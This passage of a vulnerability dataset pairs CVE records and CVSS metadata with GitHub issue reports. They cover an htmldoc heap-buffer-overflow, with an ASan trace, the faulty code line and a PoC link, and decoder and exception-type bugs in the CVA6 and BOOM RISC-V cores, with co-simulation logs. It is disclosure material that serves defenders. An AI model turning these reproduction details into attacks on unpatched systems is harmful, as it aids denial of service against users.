Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/issues/426" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:htmldoc_project:htmldoc:*:*:*:*:*:*:*:*", "matchCriteriaId": "B9DD956F-44F8-4CB5-B9FD-9269C3E931F2", "versionEndExcluding": null, "versionEndIncluding": "1.9.12", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/michaelrsweet/htmldoc/issues/426
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "michaelrsweet", "htmldoc" ]
Hello, I found a heap-buffer-overflow in write_node Reporter: dramthy from Topsec Alpha Lab test platform: htmldoc Version :current OS :Ubuntu 20.04.1 LTS aarch64 kernel: 5.4.0-53-generic compiler: gcc (Ubuntu 9.3.0-17ubuntu1~20.04) 9.3.0 reproduced: (htmldoc with asan build option) ./htmldoc-with-asan ./poc.html [poc.zip](https://github.com/michaelrsweet/htmldoc/files/6438680/poc.zip) `````` ================================================================= ==25373==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xffff8680cacf at pc 0xaaaadb308c50 bp 0xffffe65857c0 sp 0xffffe65857e0 READ of size 1 at 0xffff8680cacf thread T0 #0 0xaaaadb308c4c in write_node /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/html.cxx:588 #1 0xaaaadb3095d8 in write_all /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/html.cxx:543 #2 0xaaaadb309630 in write_all /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/html.cxx:546 #3 0xaaaadb309630 in write_all /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/html.cxx:546 #4 0xaaaadb309630 in write_all /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/html.cxx:546 #5 0xaaaadb309630 in write_all /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/html.cxx:546 #6 0xaaaadb30a014 in write_all /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/html.cxx:538 #7 0xaaaadb30a014 in html_export /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/html.cxx:167 #8 0xaaaadb2ee52c in main /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/htmldoc.cxx:1291 #9 0xffff8b72908c in __libc_start_main (/lib/aarch64-linux-gnu/libc.so.6+0x2408c) #10 0xaaaadb2ee984 (/home/vm1/workspace/Projects/afl-projects/001.htmldoc/bin-with-asan-fix-malloc2calloc+0x4b984) 0xffff8680cacf is located 1 bytes to the left of 1-byte region [0xffff8680cad0,0xffff8680cad1) allocated by thread T0 here: #0 0xffff8befa66c in __interceptor_strdup (/lib/aarch64-linux-gnu/libasan.so.5+0x8966c) #1 0xaaaadb35e684 in htmlReadFile /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/htmllib.cxx:796 #2 0xaaaadb30a55c in read_file /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/htmldoc.cxx:2492 #3 0xaaaadb2ee1a0 in main /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/htmldoc.cxx:1177 #4 0xffff8b72908c in __libc_start_main (/lib/aarch64-linux-gnu/libc.so.6+0x2408c) #5 0xaaaadb2ee984 (/home/vm1/workspace/Projects/afl-projects/001.htmldoc/bin-with-asan-fix-malloc2calloc+0x4b984) SUMMARY: AddressSanitizer: heap-buffer-overflow /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/html.cxx:588 in write_node Shadow bytes around the buggy address: 0x200ff0d01900: fa fa 00 06 fa fa 00 05 fa fa 00 06 fa fa 00 06 0x200ff0d01910: fa fa 00 04 fa fa 00 05 fa fa 00 05 fa fa 00 06 0x200ff0d01920: fa fa 00 04 fa fa 00 04 fa fa 00 05 fa fa 00 07 0x200ff0d01930: fa fa 05 fa fa fa 00 00 fa fa 07 fa fa fa 06 fa 0x200ff0d01940: fa fa 00 00 fa fa 04 fa fa fa 00 01 fa fa 05 fa =>0x200ff0d01950: fa fa 02 fa fa fa 02 fa fa[fa]01 fa fa fa 02 fa 0x200ff0d01960: fa fa 00 05 fa fa 06 fa fa fa 03 fa fa fa 03 fa 0x200ff0d01970: fa fa 04 fa fa fa 00 02 fa fa 00 02 fa fa 00 02 0x200ff0d01980: fa fa 00 02 fa fa 00 02 fa fa 04 fa fa fa 04 fa 0x200ff0d01990: fa fa 03 fa fa fa 03 fa fa fa 03 fa fa fa 00 05 0x200ff0d019a0: fa fa 00 06 fa fa 00 05 fa fa 00 07 fa fa 00 07 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==25373==ABORTING `````` this bug in htmldoc/htmldoc/html.cxx:588: `````` if (t->data[strlen((char *)t->data) - 1] == '\n') col = 0; `````` similar to ````` #include <string.h> #include <iostream> int main() { const char * s = ""; std::cout<<(int)(strlen((char *)s) - 1); return 0; } ````` the index out of bounds。
AddressSanitizer: heap-buffer-overflow on write_node htmldoc/htmldoc/html.cxx:588
https://api.github.com/repos/michaelrsweet/htmldoc/issues/426/comments
2
2021-05-07T02:47:11Z
2021-05-07T10:43:05Z
https://github.com/michaelrsweet/htmldoc/issues/426
878,358,961
426
3,850
CVE-2022-34633
2022-07-18T23:15:12.677
CVA6 commit d315ddd0f1be27c1b3f27eb0b8daf471a952299a executes crafted or incorrectly formatted sfence.vma instructions rather create an exception.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/openhwgroup/cva6/issues/876" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/openhwgroup/cva6/pull/921" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/openhwgroup/cva6/issues/876" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/openhwgroup/cva6/pull/921" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openhwgroup:cva6:-:*:*:*:*:*:*:*", "matchCriteriaId": "D73073CF-1196-4ABF-A8AE-3BE51A34519C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "755" ]
755
https://github.com/openhwgroup/cva6/issues/876
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "openhwgroup", "cva6" ]
Hi, we are currently doing some co-simulation with cva6 and spike, and we found the decoder has an incorrect behavior when meeting a sfence.vma with non-zero rd field. According to the ISA Specification (Volume II: RISC-V Privileged Architectures V20211203 Page 152) for the SFENCE.VMA format, instr[11:7] should be 5'b00000. When modified instr[11:7] to 5'b00001. cva6 treats this instruction as SFENCE.VMA as well. No exception occurred. The implementation is missing a check for this field. https://github.com/openhwgroup/cva6/blob/44a89b9cd408b869fb4ed2c0cec35e1561588e37/core/decoder.sv#L152-L165 In the following test case, there is an invalid sfence.vma at 0x80000190, whose rd field is 1, cva6 execute it as normal instruction, while spike throws an excaption. ``` [cva6] 532890ns 26637 M 000000008000018c 0 12000073 sfence.vma [spike] core 0: 0x000000008000018c (0x12000073) sfence.vma zero, zero [cva6] 534950ns 26740 M 0000000080000190 0 120000f3 sfence.vma [spike] core 0: 0x0000000080000190 (0x120000f3) unknown [spike] core 0: exception trap_illegal_instruction, epc 0x0000000080000190 [spike] core 0: tval 0x0000000000000000 ``` [cva6-0.zip](https://github.com/openhwgroup/cva6/files/8694534/cva6-0.zip) > @LuminaDCIX helps reproduce the problem
[Bug Report] incorrect SFENCE.VMA decoder
https://api.github.com/repos/openhwgroup/cva6/issues/876/comments
1
2022-05-15T08:22:54Z
2022-07-08T08:24:09Z
https://github.com/openhwgroup/cva6/issues/876
1,236,221,321
876
3,851
CVE-2022-34634
2022-07-18T23:15:12.733
CVA6 commit d315ddd0f1be27c1b3f27eb0b8daf471a952299a executes crafted or incorrectly formatted det instructions rather create an exception.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/openhwgroup/cva6/issues/899" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/openhwgroup/cva6/pull/922" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/openhwgroup/cva6/issues/899" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/openhwgroup/cva6/pull/922" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openhwgroup:cva6:-:*:*:*:*:*:*:*", "matchCriteriaId": "D73073CF-1196-4ABF-A8AE-3BE51A34519C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "755" ]
755
https://github.com/openhwgroup/cva6/issues/899
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "openhwgroup", "cva6" ]
Our co-simulation framework found the decoder has an incorrect behavior when execute a `dret` with non-zero rd field. According to the Debug Specification Version 1.0.0: > To resume execution, the debug module sets a flag which causes the hart to execute a `dret`. `dret` is an instruction that only has meaning while in Debug Mode and not executing from the Program Buffer. Its recommended encoding is 0x7b200073. When modified instr[11:7] to 5'b00001. cva6 treats this invalid `dret` as normal `dret` as well. No exception occurred. The implementation is missing a check for this field. In the following test case, there is an invalid `dret` at 0x8000019c, whose rd field is 1, cva6 execute it as normal instruction, while spike throws an excaption. ``` [spike] core 0: 0x000000008000019c (0x7b200273) unknown [spike] core 0: exception trap_illegal_instruction, epc 0x000000008000019c [spike] core 0: tval 0x000000007b200273 [spike] core 0: 0x0000000080000004 (0x00000f17) auipc t5, 0x0 [error] PC SIM 0000000080000004, DUT 000000008000019c [error] INSN SIM 00000f17, DUT 7b200273 [CJ] Commit Failed [cva6] 786ns 771 D 000000008000019c 0 7b200273 INVALID // CVA6 continues to execute [cva6] 1068ns 1053 S 000000008000017c 0 0ff0000f fence // subsequent instructions ``` We believe is the debug mode checking reset the correct signal: https://github.com/openhwgroup/cva6/blob/909d85a56cc5ace65765a63d7ed56b7ac2026f99/core/decoder.sv#L134-L135 [cva6-3.zip](https://github.com/openhwgroup/cva6/files/8833048/cva6-3.zip) > @LuminaDCIX helps reproduce the problem
[Bug Report] incorrect DRET decoder
https://api.github.com/repos/openhwgroup/cva6/issues/899/comments
1
2022-06-03T14:34:46Z
2022-07-08T08:23:33Z
https://github.com/openhwgroup/cva6/issues/899
1,259,991,150
899
3,852
CVE-2022-34636
2022-07-18T23:15:12.863
CVA6 commit d315ddd0f1be27c1b3f27eb0b8daf471a952299a and RISCV-Boom commit ad64c5419151e5e886daee7084d8399713b46b4b implements the incorrect exception type when a PMA violation occurs during address translation.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/openhwgroup/cva6/issues/905" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/riscv-boom/riscv-boom/issues/606" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/openhwgroup/cva6/issues/905" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/riscv-boom/riscv-boom/issues/606" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openhwgroup:cva6:-:*:*:*:*:*:*:*", "matchCriteriaId": "D73073CF-1196-4ABF-A8AE-3BE51A34519C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "755" ]
755
https://github.com/openhwgroup/cva6/issues/905
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "openhwgroup", "cva6" ]
Our co-simulation framework found that the exception type of address translation PMA violation is incorrect. In the following test case, we modify a non-leaf (level 2) PTE to zero, which means the level 2 page dictionary is at 0x0000. 0x0000 is not part of the address range of the memory, which clearly violates the PMA. cva6 throws a store page fault, while spike throws an access fault. ``` [cva6] Exception @ 95100, PC: 0000000080000250, Cause: Store Page Fault, [cva6] tval: 0000000040201010 [spike] core 0: 0x0000000080000250 (0x00b52023) sw a1, 0(a0) [spike] core 0: exception trap_store_access_fault, epc 0x0000000080000250 [spike] core 0: tval 0x0000000040201010 [spike] core 0: 0x0000000080000004 (0x34302f73) csrr t5, mtval [cva6] 958ns 943 M 0000000080000004 0 34302f73 csrr t5, mtval [spike] core 0: 0x0000000080000008 (0x34202f73) csrr t5, mcause [error] WDATA SIM 0000000000000007, DUT 000000000000000f [error] check board clear 30 error [CJ] integer register Judge Failed ``` According to riscv-privileged specification: > If accessing pte violates a PMA or PMP check, raise an access-fault exception corresponding to the original access type. [cva6-8.zip](https://github.com/openhwgroup/cva6/files/8861102/cva6-8.zip) > @LuminaDCIX helps reproduce the problem
[Bug Report] Incorrect exception type of PMA violation during address translation
https://api.github.com/repos/openhwgroup/cva6/issues/905/comments
1
2022-06-08T11:33:20Z
2023-02-07T20:30:25Z
https://github.com/openhwgroup/cva6/issues/905
1,264,602,708
905
3,853
CVE-2022-34636
2022-07-18T23:15:12.863
CVA6 commit d315ddd0f1be27c1b3f27eb0b8daf471a952299a and RISCV-Boom commit ad64c5419151e5e886daee7084d8399713b46b4b implements the incorrect exception type when a PMA violation occurs during address translation.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/openhwgroup/cva6/issues/905" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/riscv-boom/riscv-boom/issues/606" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/openhwgroup/cva6/issues/905" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/riscv-boom/riscv-boom/issues/606" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openhwgroup:cva6:-:*:*:*:*:*:*:*", "matchCriteriaId": "D73073CF-1196-4ABF-A8AE-3BE51A34519C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "755" ]
755
https://github.com/riscv-boom/riscv-boom/issues/606
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "riscv-boom", "riscv-boom" ]
**Type of issue**: bug report **Impact**: unknown **Development Phase**: proposal **Other information** Our co-simulation framework found that the exception type of address translation PMA violation is incorrect. In the following test case, we modify a non-leaf (level 2) PTE to zero, which means the level 2 page dictionary is at 0x0000. 0x0000 is not part of the address range of the memory, which clearly violates the PMA. boom throws a store page fault(0xf), while spike throws a store access fault(0x7). ``` [boom] 3 0x000000008000024c (0x0105051b) x10 0x0000000040201010 [spike] core 0: 0x000000008000024c (0x0105051b) addiw a0, a0, 16 [boom] 3 0x0000000080000004 (0x34302f73) x30 0x0000000040201010 [spike] core 0: 0x0000000080000250 (0x00b52023) sw a1, 0(a0) [spike] core 0: exception trap_store_access_fault, epc 0x0000000080000250 [spike] core 0: tval 0x0000000040201010 [spike] core 0: 0x0000000080000004 (0x34302f73) csrr t5, mtval [boom] 3 0x0000000080000008 (0x34202f73) x30 0x000000000000000f [spike] core 0: 0x0000000080000008 (0x34202f73) csrr t5, mcause [error] WDATA SIM 0000000000000007, DUT 000000000000000f [error] check board clear 30 error ``` According to riscv-privileged specification: > If accessing pte violates a PMA or PMP check, raise an access-fault exception corresponding to the original access type. Hence, boom should throw a store access fault. **Please tell us about your environment:** - version: `ad64c54` [boom-2.zip](https://github.com/riscv-boom/riscv-boom/files/8862357/boom-2.zip) > @LuminaDCIX helps reproduce the problem cc to @jerryz123
[Bug Report] Incorrect exception type of PMA violation during address translation
https://api.github.com/repos/riscv-boom/riscv-boom/issues/606/comments
0
2022-06-08T14:17:55Z
2022-06-08T14:25:14Z
https://github.com/riscv-boom/riscv-boom/issues/606
1,264,831,498
606
3,854
CVE-2022-34637
2022-07-18T23:15:12.923
CVA6 commit d315ddd0f1be27c1b3f27eb0b8daf471a952299a implements an incorrect exception type when an illegal virtual address is loaded.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/openhwgroup/cva6/issues/904" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/openhwgroup/cva6/issues/904" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openhwgroup:cva6:-:*:*:*:*:*:*:*", "matchCriteriaId": "D73073CF-1196-4ABF-A8AE-3BE51A34519C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "755" ]
755
https://github.com/openhwgroup/cva6/issues/904
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "openhwgroup", "cva6" ]
Our co-simulation framework found that the exception type when access/load/store an illegal virtual address is incorrect. In the following test case, we flipped the MSB of a legal virtual address and load with it at 0x00002980. cva6 throws an access fault, while spike throws a page fault. Since page fault has been delegated to s mode, they jump to different trap vectors. ``` [spike] core 0: 0x000000000000297c (0x00200193) li gp, 2 [cva6] 14681ns 14666 U 000000000000297c 0 00200193 li gp, 2 gp :0000000000000002 [cva6] Exception @ 1469600, PC: 0000000000002980, Cause: Load Access Fault, [cva6] tval: 8000000000003000 [spike] core 0: 0x0000000000002980 (0x00028383) lb t2, 0(t0) [spike] core 0: exception trap_load_page_fault, epc 0x0000000000002980 [spike] core 0: tval 0x8000000000003000 [spike] core 0: 0xffffffffffe00144 (0x14011173) csrrw sp, sscratch, sp [error] PC SIM ffffffffffe00144, DUT 0000000080000008 [error] INSN SIM 14011173, DUT 2c40206f [CJ] Commit Failed ``` According to riscv-privileged specification: > Instruction fetch addresses and load and store effective addresses, which are 64 bits, must have bits 63–39 all equal to bit 38, or else a page-fault exception will occur. Both `load`, `store`, and `fetch` can cause this issue. fetch test case: [cva6-7.zip](https://github.com/openhwgroup/cva6/files/8855465/cva6-7.zip) load test case: [cva6-6.zip](https://github.com/openhwgroup/cva6/files/8855466/cva6-6.zip) > @LuminaDCIX helps reproduce the problem
[Bug Report] Incorrect exception type for illegal virtual address access
https://api.github.com/repos/openhwgroup/cva6/issues/904/comments
1
2022-06-07T17:58:21Z
2023-02-07T20:36:18Z
https://github.com/openhwgroup/cva6/issues/904
1,263,672,668
904
3,855
CVE-2022-34639
2022-07-18T23:15:12.983
CVA6 commit d315ddd0f1be27c1b3f27eb0b8daf471a952299a treats non-standard fence instructions as illegal which can affect the function of the application.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/openhwgroup/cva6/issues/900" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/openhwgroup/cva6/pull/923" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/openhwgroup/cva6/issues/900" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/openhwgroup/cva6/pull/923" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openhwgroup:cva6:-:*:*:*:*:*:*:*", "matchCriteriaId": "D73073CF-1196-4ABF-A8AE-3BE51A34519C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "755" ]
755
https://github.com/openhwgroup/cva6/issues/900
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "openhwgroup", "cva6" ]
Our co-simulation framework found the decoder has an incorrect behavior when execute a `fence.i`/`fence` with non-zero rd field. As discussed before [719](https://github.com/openhwgroup/cva6/issues/719), `fence`/`fence.i` should ignores immediate, rs1, rd field. We found the patch [724](https://github.com/openhwgroup/cva6/pull/724) does not fix this bug. The checking after the patch still throws an exception for non-zero rd and rs1: https://github.com/openhwgroup/cva6/blob/909d85a56cc5ace65765a63d7ed56b7ac2026f99/core/decoder.sv#L238-L239 According to the The RISC-V Instruction Set Manual Volume I: Unprivileged ISA: > FENCE: The unused fields in the FENCE instructions—rs1 and rd—are reserved for finer-grain fences in future extensions. For forward compatibility, base implementations shall ignore these fields, and standard software shall zero these fields. > FENCE.I: The unused fields in the FENCE.I instruction, imm[11:0], rs1, and rd, are reserved for finer-grain fences in future extensions. For forward compatibility, base implementations shall ignore these fields, and standard software shall zero these fields. In the following test case, there is a valid `fence.i` at 0x80000194, whose rd field is 1, and a `fence` with non-zero rd at 0x80000198. cva6 still throws exceptions for them. ``` [cva6] Exception @ 68600, PC: 0000000080000194, Cause: Illegal Instruction, [cva6] tval: 000000000000120f [spike] core 0: 0x0000000080000194 (0x0000120f) fence.i [error] PC SIM 0000000080000194, DUT 0000000080000004 [error] INSN SIM 0000120f, DUT 34202f73 [CJ] Commit Failed ``` [cva6-4.zip](https://github.com/openhwgroup/cva6/files/8833868/cva6-4.zip) > @LuminaDCIX helps reproduce the problem
[Bug Report] incorrect MISC_MEM decoder
https://api.github.com/repos/openhwgroup/cva6/issues/900/comments
2
2022-06-03T15:46:03Z
2022-07-08T08:23:25Z
https://github.com/openhwgroup/cva6/issues/900
1,260,064,333
900
3,856
CVE-2022-34641
2022-07-18T23:15:13.087
CVA6 commit d315ddd0f1be27c1b3f27eb0b8daf471a952299a and RISCV-Boom commit ad64c5419151e5e886daee7084d8399713b46b4b implements the incorrect exception type when a PMP violation occurs during address translation.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/openhwgroup/cva6/issues/906" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/openhwgroup/cva6/pull/908" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/riscv-boom/riscv-boom/issues/605" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/openhwgroup/cva6/issues/906" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/openhwgroup/cva6/pull/908" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/riscv-boom/riscv-boom/issues/605" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:boom-core:riscvc-boom:-:*:*:*:*:*:*:*", "matchCriteriaId": "1507C03F-AB2F-4B03-BC3F-29B9B3690AD6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:openhwgroup:cva6:-:*:*:*:*:*:*:*", "matchCriteriaId": "D73073CF-1196-4ABF-A8AE-3BE51A34519C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "755" ]
755
https://github.com/openhwgroup/cva6/issues/906
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "openhwgroup", "cva6" ]
